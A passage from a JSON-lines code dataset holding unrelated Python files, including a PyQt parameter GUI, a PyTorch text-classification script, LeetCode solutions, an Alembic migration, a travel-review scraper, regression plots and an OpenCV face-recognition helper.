model in the tree\n self.tree.setModel(filter_model)\n\n # Set the header mode\n self.tree.header().setStretchLastSection(True)\n self.tree.header().setResizeMode(0, QHeaderView.ResizeToContents)\n\n # Start everything expanded\n self.tree.expandAll()\n\n # Create the layout\n layout = QVBoxLayout()\n layout.setMargin(0)\n layout.addWidget(self.tree)\n self.setLayout(layout)\n\n def setExpertLevel(self, level):\n self.tree.model().setExpertLevel(level)\n\n def setSearchString(self, text):\n self.tree.model().setSearchString(text)\n\n\nclass ParameterWidget(QWidget):\n\n def __init__(self, parent=None, parameters=None):\n\n super(ParameterWidget, self).__init__(parent)\n\n # Create the parameter window widget\n self.params = ParameterTreeWidget(None, parameters)\n\n # Create the search widget\n self.search = QLineEdit()\n self.search.setPlaceholderText(\"Search...\")\n self.search.textChanged.connect(self.params.setSearchString)\n\n # Create the expert level widget\n self.expert = QComboBox()\n self.expert.addItem(\"Simple\")\n self.expert.addItem(\"Advanced\")\n self.expert.currentIndexChanged.connect(self.params.setExpertLevel)\n\n # Layout the controls\n control_layout = QHBoxLayout()\n control_layout.addWidget(self.expert)\n control_layout.addWidget(self.search)\n\n # Create the widget layout\n main_layout = QVBoxLayout()\n main_layout.addLayout(control_layout)\n main_layout.addWidget(self.params)\n self.setLayout(main_layout)\n\n def setParameters(self, parameters):\n self.params.setParameters(parameters)\n\n def setExpertLevel(self, level):\n self.params.setExpertLevel(level)\n\n\nclass IntegrateParameterWidget(ParameterWidget):\n\n def __init__(self, parent=None):\n from dials.command_line.integrate import phil_scope\n\n # Init parent\n super(IntegrateParameterWidget, self).__init__(parent, phil_scope)\n\n\nclass MainWindow(QMainWindow):\n\n def __init__(self, parent=None):\n\n # Call the parent constructor\n super(MainWindow, self).__init__(parent)\n\n # Create the parameter window widget\n params = IntegrateParameterWidget()\n\n # Create the window layout\n layout = QVBoxLayout()\n layout.addWidget(params)\n\n # Setup the window contents\n window = QWidget()\n window.setLayout(layout)\n self.setCentralWidget(window)\n\n\nif __name__ == '__main__':\n import sys\n\n # Create the application\n app = QApplication(sys.argv)\n\n # Create the main window\n window = MainWindow()\n window.resize(800, 600)\n window.show()\n\n # Execute the application\n sys.exit(app.exec_())\n\n\n\n\n\n","sub_path":"lui_testing/PyQt4_toys/JMP_phil_par_test/phil_param_gui_vanilla.py","file_name":"phil_param_gui_vanilla.py","file_ext":"py","file_size_in_byte":11882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"180426763","text":"import os\nimport argparse\nimport datetime\nimport torch\nimport torchtext.data as data\nimport train_cnn\nimport train_lstm\nimport dataset\nfrom torchtext.vocab import Vectors\nfrom models.model_CNN import CNNText\nfrom models.model_mulit_CNN import MultiCNNText\nfrom models.model_LSTM import LSTM\nfrom models.model_GRU import GRU\nfrom models.model_BiLSTM import BiLSTM\nfrom models.model_CNN_LSTM import CNN_LSTM\nfrom models.model_BiGRU import BiGRU\n\n\ncache = '.vector_cache'\ndef parser_set():\n # 命令行参数解析\n # 输入的参数 都会对参数进行数据处理\n # 如 python main.py -lr 0.01 就可以设置学习率为0.01\n parser = argparse.ArgumentParser(description='CNN 句子分类器')\n\n # 训练相关参数\n parser.add_argument('-lr', type=float, default=0.001, help='初始化学习率[默认: 0.001]')\n parser.add_argument('-epochs', type=int, default=256, help='训练中 总的数据训练轮数[默认: 256]')\n parser.add_argument('-batch-size', type=int, default=64, help='训练中 一个批量的数据个数[默认: 64]')\n parser.add_argument('-log-interval', type=int, default=1, help='多少次迭代进行训练打印[default: 1]')\n parser.add_argument('-test-interval', type=int, default=100, help='多少次迭代进行测试[default: 100]')\n parser.add_argument('-save-interval', type=int, default=500, help='多少次迭代进行保存数据[default:500]')\n parser.add_argument('-save-dir', type=str, default='snapshot', help='快照保存位置')\n parser.add_argument('-early-stop', type=int, default=1000, help='效果没有增加 则 多少次迭代停止')\n parser.add_argument('-save-best', type=bool, default=True, help='最好效果时 是否保存数据')\n # data\n parser.add_argument('-shuffle', action='store_true', default=False, help='每轮 是否都进行随机数据')\n # model\n parser.add_argument('-dropout', type=float, default=0.5, help='随机丢弃的概率[默认: 0.5]')\n parser.add_argument('-max-norm', type=float, default=3.0, help='L2正则化[默认: 3.0]')\n parser.add_argument('-embed-dim', type=int, default=300, help='Glove词向量维度[默认: 300]')\n parser.add_argument('-kernel-num', type=int, default=100, help='每种卷积核的个数')\n parser.add_argument('-kernel-sizes', type=str, default='3,4,5', help='卷积核的大小 三种')\n parser.add_argument('-static', action='store_true', default=False, help='是否修改词向量')\n # device\n parser.add_argument('-device', type=int, default=-1, help='进行数据迭代的设别 -1表示CPU[默认: -1]')\n parser.add_argument('-no-cuda', action='store_true', default=False, help='不使用GPU')\n # option\n parser.add_argument('-snapshot', type=str, default=None, help='模型快照的文件名[默认: None]')\n # 当在终端运行的时候,如果不加入 -train, 那么程序running的时候,train的值为默认值: False\n # 如果加上了-train,不需要指定True/False,那么程序running的时候,train的值为True\n parser.add_argument('-train', action='store_true', default=False, help='进行模型训练')\n parser.add_argument('-test', action='store_true', default=False, help='是否测试')\n parser.add_argument('-predict', type=str, default=None, help='预测给定的句子')\n parser.add_argument('-embed-type', type=str, default='rand', help='使用什么embedding,默认使用随机embedding')\n parser.add_argument('-model-type', type=str, default='CNN', help='使用什么模型,默认CNN')\n args = parser.parse_args()\n return args\n\n\ndef update_parser_set():\n # 词的词表大小正好就是 词向量矩阵(V*D)的行V,维度D可以自己指定\n args.embed_dropout = 0.5\n args.lstm_hidden_dim = 300\n args.lstm_num_layers = 1\n args.lstm_weight_init = True\n args.lstm_weight_init_value = 2.0\n print(\"update_parser_set\")\n args.embed_num = len(args.text_field.vocab)\n args.class_num = len(args.label_field.vocab)\n args.cuda = (not args.no_cuda) and torch.cuda.is_available();del args.no_cuda\n # 将kernel_sizes 划分出来\n args.kernel_sizes = [int(k) for k in args.kernel_sizes.split(',')]\n args.save_dir = os.path.join(args.save_dir, datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S'))\n\n\ndef mr_multi(text_field, label_field, static_text_field, static_label_field, **kwargs):\n # 获取数据\n train_data, dev_data = dataset.MR.splits(text_field, label_field)\n static_train_data, static_dev_data = dataset.MR.splits(static_text_field, static_label_field)\n # 构建词表\n text_field.build_vocab(train_data, dev_data)\n label_field.build_vocab(train_data, dev_data)\n # 构建 预训练词向量 词表\n if not os.path.exists(cache):\n print(\"不存在此目录,创建此目录\")\n os.mkdir(cache)\n vectors = Vectors(name='.vector_cache/glove.6B/glove.6B.300d.txt', cache=cache)\n static_text_field.build_vocab(static_train_data, static_dev_data, vectors=vectors)\n static_label_field.build_vocab(static_train_data, static_dev_data)\n # 加载 预训练向量权重\n args.static_weight_matrix = static_text_field.vocab.vectors\n # 创建一个迭代器 从数据集中 加载 batches 的数据\n # 为数据集的多个拆分 创建迭代器 生成 batch\n train_iter, dev_iter = data.Iterator.splits(\n (train_data, dev_data),\n batch_sizes=(args.batch_size, len(dev_data)),\n **kwargs)\n return train_iter, dev_iter\n\n\n# 加载 MR 数据集\ndef mr(text_field, label_field, **kwargs):\n # 采用自己写的 dataset 数据集用于MR\n train_data, dev_data = dataset.MR.splits(text_field, label_field)\n if args.embed_type == 'rand':\n print(\"使用 随机embedding\")\n text_field.build_vocab(train_data, dev_data)\n label_field.build_vocab(train_data, dev_data)\n elif args.embed_type == 'static':\n print(\"使用 静态外部embedding\")\n if not os.path.exists(cache):\n print(\"不存在此目录,创建此目录\")\n os.mkdir(cache)\n vectors = Vectors(name='.vector_cache/glove.6B/glove.6B.300d.txt', cache=cache)\n text_field.build_vocab(train_data, dev_data, vectors=vectors)\n label_field.build_vocab(train_data, dev_data)\n args.weight_matrix = text_field.vocab.vectors\n elif args.embed_type == 'not-static':\n print(\"使用 非静态 外部embedding\")\n if not os.path.exists(cache):\n print(\"不存在此目录,创建此目录\")\n os.mkdir(cache)\n vectors = Vectors(name='.vector_cache/glove.6B/glove.6B.300d.txt', cache=cache)\n text_field.build_vocab(train_data, dev_data, vectors=vectors)\n label_field.build_vocab(train_data, dev_data)\n args.weight_matrix = text_field.vocab.vectors\n\n # 创建一个迭代器 从数据集中 加载 batches 的数据\n # 为数据集的多个拆分 创建迭代器 生成 batch\n train_iter, dev_iter = data.Iterator.splits(\n (train_data, dev_data),\n batch_sizes=(args.batch_size, len(dev_data)),\n **kwargs)\n # train_iter batch 150个 9596/64=150\n # dev_iter batch 1个\n return train_iter, dev_iter\n\n\ndef define_dict():\n \"\"\"\n 因为使用torchtext 所以使用了 定义字段\n :return:\n \"\"\"\n # 首先定义字段的处理方法 包含一写文本处理的通用参数的设置\n # lower 是否把数据转化为小写\n # sequential 是否把数据表示成序列,如果是False, 不能使用分词\n args.text_field = data.Field(lower=True)\n args.label_field = data.Field(sequential=False)\n args.static_text_field = data.Field(lower=True)\n args.static_label_field = data.Field(sequential=False)\n print(\"定义字段完成\")\n\ndef load_data(set_model, train):\n if args.model_type == 'CNN':\n print(\"使用CNN 模式数据集\")\n # 加载MR的数据集 传入 样本的field和标签的field格式, 设备选择CPU\n train_iter, dev_iter = mr(args.text_field, args.label_field, device=-1, repeat=False)\n elif args.model_type == 'CNN_multi':\n print(\"使用CNN_multi 模式数据集\")\n train_iter, dev_iter = mr_multi(args.text_field, args.label_field, args.static_text_field,\n args.static_label_field, device=-1, repeat=False)\n elif args.model_type == 'LSTM':\n print(\"使用lstm 模式数据集\")\n train_iter, dev_iter = mr(args.text_field, args.label_field, device=-1, repeat=False)\n elif args.model_type == 'BILSTM':\n print(\"使用BILSTM 模式数据集\")\n train_iter, dev_iter = mr(args.text_field, args.label_field, device=-1, repeat=False)\n elif args.model_type == 'GRU':\n print(\"使用GRU 模式数据集\")\n train_iter, dev_iter = mr(args.text_field, args.label_field, device=-1, repeat=False)\n elif args.model_type == 'BIGRU':\n print(\"使用BIGRU 模式数据集\")\n train_iter, dev_iter = mr(args.text_field, args.label_field, device=-1, repeat=False)\n elif args.model_type == 'CNN_LSTM':\n print(\"使用CNN_LSTM 模式数据集\")\n train_iter, dev_iter = mr(args.text_field, args.label_field, device=-1, repeat=False)\n\n # 更新参数 并打印\n update_parser_set()\n print(\"\\n 参数设置:\")\n for attr, value in sorted(args.__dict__.items()):\n print(\"\\t{}={}\".format(attr.upper(), value))\n\n # 构建模型实例\n if args.model_type == 'CNN':\n set_model = CNNText(args)\n train = train_cnn.train(train_iter, dev_iter, set_model, args)\n elif args.model_type == 'CNN_multi':\n set_model = MultiCNNText(args)\n train = train_cnn.train(train_iter, dev_iter, set_model, args)\n elif args.model_type == 'LSTM':\n set_model = LSTM(args)\n train = train_lstm.train(train_iter, dev_iter, set_model, args)\n elif args.model_type == 'GRU':\n set_model = GRU(args)\n train = train_lstm.train(train_iter, dev_iter, set_model, args)\n elif args.model_type == 'BILSTM':\n set_model = BiLSTM(args)\n train = train_lstm.train(train_iter, dev_iter, set_model, args)\n elif args.model_type == 'BIGRU':\n set_model = BiGRU(args)\n train = train_lstm.train(train_iter, dev_iter, set_model, args)\n elif args.model_type == 'CNN_LSTM':\n set_model = CNN_LSTM(args)\n train = train_lstm.train(train_iter, dev_iter, set_model, args)\n return train_iter, dev_iter\n\n\n# 主程序启动的地方\nif __name__ == '__main__':\n # 对参数进行设置\n args = parser_set()\n # 定义字段\n define_dict()\n # 加载数据集\n print(\"正在加载数据集...\")\n\n set_model = None\n train = None\n train_iter, dev_iter = load_data(set_model, train)\n\n # 如果有 cuda 就调用 cuda 来跑模型\n if args.cuda:\n torch.cuda.set_device(args.device)\n set_model = set_model.cuda()\n\n # 训练和测试模型\n # 预测命令存在 则进行预测\n if args.predict is not None:\n print(\"加载模型\")\n f = open(\"best_model.txt\", 'r')\n args.snapshot = f.readline()\n f.close()\n print(\"开始预测模型\")\n if args.model_type == 'lstm':\n set_model.load_state_dict(torch.load(args.snapshot))\n label = train_lstm.predict(args.predict, set_model, args.text_field, args.label_field, False)\n print('\\n[Text] {}\\n[label] {}\\n'.format(args.predict, label))\n else:\n set_model.load_state_dict(torch.load(args.snapshot))\n label = train_cnn.predict(args.predict, set_model, args.text_field, args.label_field, False)\n print('\\n[Text] {}\\n[label] {}\\n'.format(args.predict, label))\n # 存在测试命令 就进行测试\n elif args.test:\n try:\n train_cnn.eval(test_iter, set_model, args)\n except Exception as e:\n print(\"\\n测试集不存在.\\n\")\n # 否则就进行训练\n elif args.train:\n print(\"开始训练模型\")\n try:\n train(train_iter, dev_iter, set_model, args)\n except KeyboardInterrupt:\n print('\\n' + '-' * 89)\n print('退出了')\n else:\n print(\"请输入 需要执行的操作 -train -test -predict=str 等等\")\n","sub_path":"CNN_Classificaion_all_models/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"140889496","text":"\"\"\"\nDefinition of TreeNode:\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left, self.right = None, None\n\"\"\"\nimport sys\nsys.path.append('/home/paxos/Leetcode/Lpy3/')\nfrom lintclass.graph import TreeBuilder, TreeNode\n\n\nclass Solution:\n \"\"\"\n @param root: the given BST\n @param p: the given node\n @return: the in-order predecessor of the given node in the BST\n \"\"\"\n def inorderPredecessor(self, root, p):\n # write your code here\n pre = None\n\n while root:\n if root.val >= p.val:\n root = root.left\n else:\n pre = root\n root = root.right\n return pre\n\n\ndef main():\n seri = \"{2,0,4,#,1,3,5}\"\n # seri = \"{1,#,2}\"\n tb = TreeBuilder()\n root = tb.deserialize(seri)\n sol = Solution()\n ans = sol.inorderPredecessor(root, root)\n print(ans)\n\n\nmain()\n","sub_path":"lint-915-inorder-predecessor-in-bst/solution1.py","file_name":"solution1.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"323137535","text":"#\n# @lc app=leetcode id=387 lang=python3\n#\n# [387] First Unique Character in a String\n#\n\n# @lc code=start\nclass Solution:\n def firstUniqChar(self, s: str) -> int:\n wro = set()\n for i in range(0, len(s)):\n if(s[i] not in s[i+1:] and s[i] not in wro):\n return i\n else:\n wro.add(s[i])\n return -1\n\n# @lc code=end\nprint(Solution().firstUniqChar(\"cc\"))\n","sub_path":"heregreat/python/387.first-unique-character-in-a-string.py","file_name":"387.first-unique-character-in-a-string.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"247775415","text":"\"\"\"empty message\n\nRevision ID: 0e215ebb9c6f\nRevises: 48ead5f04096\nCreate Date: 2021-01-15 00:45:39.750110\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '0e215ebb9c6f'\ndown_revision = '48ead5f04096'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('projects_importance',\n sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('project_id', sa.Integer(), nullable=False),\n sa.Column('service', sa.String(length=50), nullable=False),\n sa.Column('importance', sa.Integer(), nullable=False),\n sa.Column('created_at', sa.DateTime(), nullable=False),\n sa.Column('updated_at', sa.DateTime(), nullable=False),\n sa.CheckConstraint('updated_at >= created_at'),\n sa.ForeignKeyConstraint(['project_id'], ['projects.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('projects_importance')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/0e215ebb9c6f_.py","file_name":"0e215ebb9c6f_.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"16314826","text":"import sys\nimport requests\nimport json\n\nbaseurl = 'http://mobileapi.dom.ria.com/request/auto_get_search/';\npayload = {\n\t'with_users': '1',\n\t'currency' : '1',\n\t'rashod_topliva_from' : '0',\n\t'with_photo':1,\n\t'rashod_topliva_to':0.0,\n\t'price_do':8000,\n\t'category_id':1,\n\t'rashod_type_id':65,\n\t's_yers':2004,\n\t'po_yers':2014,\n\t'damage':1,\n\t'marka_id[0]':67,\n\t'engineVolumeTo':0.0,\n\t'engineVolumeFrom':0.0,\n\t'countpage':20,\n\t'order_by':5,\n\t'lang_id':2,\n}\nr = requests.get(baseurl, params=payload)\n\nprint(r.text)","sub_path":"example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"249631797","text":"__author__ = 'Rahul G'\nimport urllib.request\nfrom bs4 import BeautifulSoup\n#Beautifulsoup is not only beautiful but extremely powerful :D\nimport sqlite3\nconn=sqlite3.connect('TravelIQReviews')\n\nprimaryURL = \"http://www.holidayiq.com/destinations/\"\nprimaryHTML = urllib.request.urlopen(primaryURL).read()\nsoup = BeautifulSoup(primaryHTML,'html.parser')\nweekendList=soup.find_all(\"ul\", {\"id\" : \"weekend-getaway-list\"})[0].find_all(\"li\")\nstatesUrl=[]\nfor states in weekendList:\n statesUrl.append(states.find_all(\"a\",{})[0].get(\"href\"))\nnamesList=[]\nfor url in statesUrl:\n htmlData = urllib.request.urlopen(url).read()\n soup = BeautifulSoup(htmlData,'html.parser')\n destinations = soup.find_all(\"div\",{\"class\":\"weekend-section-one\"})\n for namesOfDestinations in destinations:\n namesList.append(namesOfDestinations.get(\"data-destination-name\"))\n\nfor place in namesList:\n placeUrl=primaryURL+place\n try:\n htmlData = urllib.request.urlopen(placeUrl).read()\n soup = BeautifulSoup(htmlData,'html.parser')\n reviews=(soup.find_all(\"div\",{\"id\":\"REVIEWS\"}))\n for i in reviews:\n reviewSet = i.find_all(\"div\", {\"class\":\"hotel-view\"})\n for i in reviewSet:\n name=i.find_all(\"li\",{\"class\":\"reviewer-name\"})[0].text\n header=i.find_all(\"a\",{\"class\":\"reviews-tag-line-link\"})[0].text\n review=i.find_all(\"blockquote\",{\"class\":\"margin0 review_datail_height\"})[0].text\n #print(place,names,header,review,'\\n')\n conn.execute(\"INSERT INTO Reviews (place,name,heading,review) VALUES(?,?,?,?)\" ,(place,name,header,review))\n conn.commit()\n except:\n print(place)\n pass\nconn.close()\n\n\n","sub_path":"HolidayIQALLReviews.py","file_name":"HolidayIQALLReviews.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"264290444","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import linear_model\nfrom sklearn import metrics\nimport seaborn as sns\nimport statsmodels.api as sm\nimport pandas as pd\n\n#%% Useful functions\n\ndef perform_regression(x, y):\n x = x.reshape(-1, 1)\n reg = linear_model.LinearRegression().fit(x, y)\n pred = reg.predict(x)\n results = pd.DataFrame(pred, columns=['y_pred'])\n results['y_true'] = y\n return results\n\ndef lin_plot(results):\n pred = results['y_pred']\n y = results['y_true']\n r2 = metrics.r2_score(pred, y)\n mae = metrics.mean_absolute_error(pred, y)\n sns.pairplot(data=results, x_vars='y_pred', y_vars='y_true', kind='reg', size=5, aspect=1)\n plt.annotate('$R^2$=%.2f, MAE=%.2f' % (r2, mae), xy=(0.05, 0.95), xycoords='axes fraction')\n plt.show()\n\ndef residual_plots(y, pred):\n residuals = pred - y\n standardised_residuals = residuals / np.sqrt(pred)\n fig, ax = plt.subplots(2,2, figsize=(16,10))\n ax[0,0].scatter(x=pred, y=residuals, s=40)\n ax[0,0].axhline(y=0, c='black',linestyle='--')\n ax[0,0].set_title(\"Residuals\")\n sm.qqplot(residuals, line='s', ax=ax[0,1])\n ax[0,1].set_title(\"Residuals QQ Plot\")\n ax[1,0].scatter(pred, residuals, s=40)\n ax[1,0].axhline(y=0, c='black', linestyle='--')\n ax[1,0].set_title(\"Residuals vs Predictions\")\n ax[1,1].scatter(pred,standardised_residuals, s=40)\n ax[1,1].set_title(\"Standardised Residuals vs Predictions\")\n ax[1,1].axhline(y=3, c='black')\n ax[1,1].axhline(y=-3, c='black')\n plt.show()\n\n#%% Generate 2000 independent samples for x variable - normally distributed with a mean of 20 an stdev of 1\n\nx = np.random.normal(20, 1, size=200)\nplt.hist(x, density=True, histtype='step', bins=10)\nplt.show()\n\n#%% Generate y variables according to linear equation:\n### y = 2x + 3 + e\n### B1 = 2, c = 3, e = irreducible error\n\ny = 3 + 2*x + np.random.normal(20,1, size=200)\nplt.hist(y, density=True, histtype='step')\nplt.show()\n\n\n#%% Perform regression\n\nresults = perform_regression(x, y)\nlin_plot(results)\n\n#%% Residual plot analysis\n\nresidual_plots(y, results['y_pred'])\n\n#%% Generate non-linear data\n\ny_nonlin = 3 + 2*x+ np.random.exponential(scale=20, size=200)\nplt.scatter(x, y_nonlin)\nplt.show()\n\n#%% Perform regression\n\nresults_nonlin = perform_regression(x, y_nonlin)\nlin_plot(results)\n\n#%% Plot residuals\n\nresidual_plots(y_nonlin, results_nonlin['y_pred'])\n\n\n\n#%% Generate heteroskedatic data\n\nx_het = np.random.exponential(scale=1, size=200)\nplt.scatter(x_het, y)\nplt.show()\n\n\n#%%\n\ny_het= 3 + 2*x_het + np.random.normal(20,1, size=200)\nplt.hist(y_het, density=True, histtype='step')\nplt.show()\n\n#%% Perform regression\n\nresults_het = perform_regression(x_het, y_het)\nlin_plot(results_het)\n\n\n#%% Residual plots\n\nresidual_plots(y_het, results_het['y_pred'])\n","sub_path":"linear_regression/residuals.py","file_name":"residuals.py","file_ext":"py","file_size_in_byte":2803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"443976780","text":"def primes_sieve(limit):\n limitn = limit+1\n primes = dict()\n for i in range(2, limitn): primes[i] = True\n\n for i in primes:\n factors = range(i,limitn, i)\n for f in factors[1:]:\n primes[f] = False\n return [i for i in primes if primes[i]==True]\n\n\ndef palindromic_numbers(limit):\n\tlimitn = limit+1\n\tpalindromic = []\n\tfor i in range(limitn):\n\t\tif str(i) == str(i)[::-1]:\n\t\t\tpalindromic.append(i)\n\treturn palindromic\n\nprint('primes = [' + ', '.join(map(str, primes_sieve(10**6))) + ']')\nprint('palindromic = [' + ', '.join(map(str, palindromic_numbers(10**6))) + ']')\n","sub_path":"cf/315/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"283736485","text":"import numpy as np\nimport cv2\nimport pickle\nfrom PIL import Image\nimport os\nimport pathlib\n\nclass FaceCapture(object):\n\n def detect_face(self):\n img = \"app/faceshot0.png\"\n face_cascade = cv2.CascadeClassifier(\"C:/Users/prana/OneDrive/Desktop/web_dev/ocr_trial/flask_cbit_smart_attendance/app/face_recognition_training_files/haarcascade_frontalface_alt2.xml\")\n recognizer = cv2.face.LBPHFaceRecognizer_create()\n recognizer.read(\"C:/Users/prana/OneDrive/Desktop/web_dev/ocr_trial/flask_cbit_smart_attendance/app/trainer.yml\")\n\n labels = {\"160119733136\": 160119733136}\n filename = \"/C:/Users/prana/OneDrive/Desktop/web_dev/ocr_trial/flask_cbit_smart_attendance/app/labels.pickle\"\n HERE = pathlib.Path(__file__).parent\n with open(HERE/\"labels.pickle\", \"rb\") as f:\n og_labels = pickle.load(f)\n labels = {v:k for k,v in og_labels.items()}\n\n face_img = np.array(Image.open(img))\n face_img = cv2.resize(face_img, (450,450))\n gray = cv2.cvtColor(face_img, cv2.COLOR_BGR2GRAY)\n face_rects = face_cascade.detectMultiScale(face_img)\n for (x,y,w,h) in face_rects:\n cv2.rectangle(face_img, (x,y), (x+w,y+h), (255,255,255), 5)\n roi_gray = gray[y:y+h, x:x+w]\n roi_color = face_img[y:y+h, x:x+w]\n\n id_, conf = recognizer.predict(roi_gray)\n \n if \"id_\" in locals():\n return labels[id_]\n else:\n return \"Try Again\" \n ","sub_path":"flask_cbit_smart_attendance/app/face_cam.py","file_name":"face_cam.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"476288004","text":"import numpy as np\nimport h5py\nimport keras\nfrom keras.models import load_model\nimport pickle\n\nDATA_PATH = '/home/frederik/gitdisst/hand-orientation-inference/modelling/'\nMODEL_PATH = '/home/frederik/gitdisst/hand-orientation-inference/models/'\n\ndef labels_to_angles(labels):\n labels_angles = (labels * 180 / np.pi) - 90\n return labels_angles\n\ndef standardise_and_reshape_data(full, med, low):\n full = np.reshape(full, [len(full), 128, 128, 1])\n med = np.reshape(med, [len(med), 64, 64, 1])\n low = np.reshape(low, [len(low), 32, 32, 1])\n full = [x.astype('float32') for x in full]\n full = np.array([(x / 255) for x in full])\n med = [x.astype('float32') for x in med]\n med = np.array([x / 255 for x in med])\n low = [x.astype('float32') for x in low]\n low = np.array([x / 255 for x in low])\n return full, med, low\n\ndef get_best_and_worst_indices(errors, output_name, good_threshold=3, poor_threshold=20):\n under_indices_elevation = np.where(errors[:,0] < good_threshold)\n under_indices_zenith = np.where(errors[:,1] < good_threshold)\n over_indices_elevation = np.where(errors[:,0] > poor_threshold)\n over_indices_zenith = np.where(errors[:,1] < poor_threshold)\n return {output_name: [{'good_elev':under_indices_elevation},\n {'good_zen':under_indices_zenith},\n {'bad_elev':over_indices_elevation},\n {'bad_zen':over_indices_zenith}]}\n\n\nfull_res = np.load(DATA_PATH + 'AllBW.npy')\nmed_res = np.load(DATA_PATH + 'AllImagesBW64.npy')\nlow_res = np.load(DATA_PATH + 'AllImagesBW32.npy')\nlabels = np.load(DATA_PATH + 'AllAngles.npy')\n\ngood_model = load_model(MODEL_PATH + 'vanilla_15.h5')\nbad_model = load_model(MODEL_PATH + 'vanilla_15_bad.h5')\n\nfull, med, low = standardise_and_reshape_data(full_res, med_res, low_res)\n\ntest_index = int(len(full_res) * 0.8)\nfull = full[test_index:]\nmed = med[test_index:]\nlow = low[test_index:]\nlabels = labels[test_index:]\n\ngood_predictions = good_model.predict([full, med, low])\nbad_predictions = bad_model.predict([full, med, low])\n\ngood_angles = (good_predictions * 90) - 45\nbad_angles = (bad_predictions * 90) -45\ntrue_angles = labels_to_angles(labels)\n\ngood_error = abs(true_angles - good_angles)\nbad_error = abs(true_angles - bad_angles)\n\n\ngood_vanilla_indices = get_best_and_worst_indices(good_error, output_name='vanilla_good',\n good_threshold=3, poor_threshold=20)\n# not really relevant because constant predictor\nbad_vanilla_indices = get_best_and_worst_indices(bad_error, output_name='vanilla_bad',\n good_threshold=3, poor_threshold=20)\n\nwith open('good_vanilla_indices.pickle', 'wb') as handle:\n pickle.dump(good_vanilla_indices, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\nwith open('bad_vanilla_indices.pickle', 'wb') as handle:\n pickle.dump(bad_vanilla_indices, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n\n\n","sub_path":"resultstesting/get_indices.py","file_name":"get_indices.py","file_ext":"py","file_size_in_byte":2978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"315427355","text":"\"\"\"\n\nGiven a string containing just the characters '(' and ')', find the length of the longest valid (well-formed) parentheses substring.\n\nFor \"(()\", the longest valid parentheses substring is \"()\", which has length = 2.\n\nAnother example is \")()())\", where the longest valid parentheses substring is \"()()\", which has length = 4.\n\"\"\"\n\"\"\"\nMy solution uses DP. The main idea is as follows: I construct a array longest[], for any longest[i], it stores the longest length of valid parentheses which is end at i.\n\nAnd the DP idea is :\n\nIf s[i] is '(', set longest[i] to 0,because any string end with '(' cannot be a valid one.\n\nElse if s[i] is ')'\n\n If s[i-1] is '(', longest[i] = longest[i-2] + 2\n\n Else if s[i-1] is ')' and s[i-longest[i-1]-1] == '(', longest[i] = longest[i-1] + 2 + longest[i-longest[i-1]-2]\n\nFor example, input \"()(())\", at i = 5, longest array is [0,2,0,0,2,0], longest[5] = longest[4] + 2 + longest[1] = 6.\n求极值问题一般想到DP或Greedy,显然Greedy在这里不太适用,只有用DP了。\n\n1. 状态:\nDP[i]:以s[i-1]为结尾的longest valid parentheses substring的长度。\n\n2. 通项公式:\ns[i] = '(':\nDP[i] = 0\n\ns[i] = ')':找i前一个字符的最长括号串DP[i]的前一个字符j = i-2-DP[i-1]\nDP[i] = DP[i-1] + 2 + DP[j],如果j >=0,且s[j] = '('\nDP[i] = 0,如果j<0,或s[j] = ')'\n\n......... ( x x x x )\n j i-2 i-1\n\n证明:不存在j' < j,且s[j' : i]为valid parentheses substring。\n假如存在这样的j',则s[j'+1 : i-1]也valid。那么对于i-1来说:\n( x x x x x\nj' j'+1 i-1\n这种情况下,i-1是不可能有比S[j'+1 : i-1]更长的valid parentheses substring的。\n\n3. 计算方向\n显然自左向右,且DP[0] = 0\nhttp://bangbingsyb.blogspot.com/2014/11/leetcode-longest-valid-parentheses.html\n\"\"\"\nclass Solution(object):\n def longestValidParentheses(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n if len(s) < 2:\n return 0\n longest = [0 for _ in range(len(s))]\n max_length = 0\n for i in range(1, len(s)):\n if s[i] == \")\":\n if s[i - 1] == \"(\": #类型一:(......)()\n longest[i] = longest[i - 2] + 2 if i >= 2 else 2\n elif i - longest[i - 1] - 1 >= 0 and s[i - longest[i - 1] - 1] == \"(\": # ((...))\n longest[i] = longest[i - 1] + 2\n if i - longest[i - 1] - 2 >= 0: # 如果前面还有东西....((....))\n longest[i] += longest[i - longest[i - 1] - 2]\n max_length = max(max_length, longest[i])\n return max_length\n\nclass 